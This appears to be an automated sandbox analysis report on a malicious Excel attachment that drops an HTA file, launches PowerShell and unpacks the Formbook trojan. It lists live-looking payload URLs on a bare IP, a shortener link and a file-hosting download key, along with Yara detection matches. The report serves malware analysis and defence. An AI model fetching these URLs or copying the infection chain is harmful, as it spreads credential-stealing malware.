Source: mshta.exe, 00000004.00000002.428991185.0000000000215000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.00000000003BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaes
Source: mshta.exe, 00000004.00000003.422140818.0000000000246000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.422140818.0000000000234000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghlig
Source: mshta.exe, 0000000F.00000003.476457131.00000000003D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghligM
Source: mshta.exe, 0000000F.00000002.477656295.000000000036E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghlight=delicious&middleman=magenta&span
Source: mshta.exe, 00000004.00000002.428991185.000000000027A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.422140818.000000000027A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423819561.000000000027A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaght=delicious&middl
Source: mshta.exe, 0000000F.00000003.476457131.00000000003D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.00000000003D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.00000000003D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaght=delicious&middl0
Source: mshta.exe, 00000004.00000003.424465133.00000000027D5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477594766.0000000002BB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htahttp://146.70.113.200/231/dnv/seemebestt
Source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/seethe
Source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.490184350.000000001ABAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIF
Source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIFp
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.450756599.000000001A782000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000013.00000002.490602752.000000001C251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.cr
Source: powershell.exe, 00000008.00000002.448366945.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000008.00000002.448366945.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.507185245.00000000020C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.485237811.0000000002391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.539807385.0000000002191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 0000000D.00000002.507185245.00000000022C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.539807385.0000000002391000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1016.filemail.com
Source: powershell.exe, 00000019.00000002.539807385.0000000002391000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T
Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: mshta.exe, 00000004.00000003.421980549.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423720169.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.0000000000417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://linkjago.me/
Source: mshta.exe, 00000004.00000002.429165944.00000000038F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://linkjago.me/H
Source: mshta.exe, 00000004.00000002.429165944.00000000038F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://linkjago.me/L
Source: mshta.exe, 0000000F.00000002.477656295.000000000036E000.00000004.00000020.00020000.00000000.sdmp, PO#BBGR2411PO69.xls, 09230000.0.dr	String found in binary or memory: https://linkjago.me/RHCYXp?&damage=nasty
Source: mshta.exe, 0000000F.00000003.477431887.00000000003D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://linkjago.me/RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&s
Source: mshta.exe, 0000000F.00000003.473697893.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477245405.0000000003CB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477913163.0000000003CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://linkjago.me/S
Source: mshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.0000000000417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://linkjago.me/r
Source: mshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.0000000000417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://linkjago.me/v
Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49169 version: TLS 1.2

Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3108, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3512, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Excel sheet contains many unusual embedded objects

Source: PO#BBGR2411PO69.xls	OLE: Microsoft Excel 2007+
Source: PO#BBGR2411PO69.xls	OLE: Microsoft Excel 2007+
Source: 09230000.0.dr	OLE: Microsoft Excel 2007+
Source: 09230000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthingsgivenmegood[1].hta

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Wscript starts Powershell (via cmd or directly)

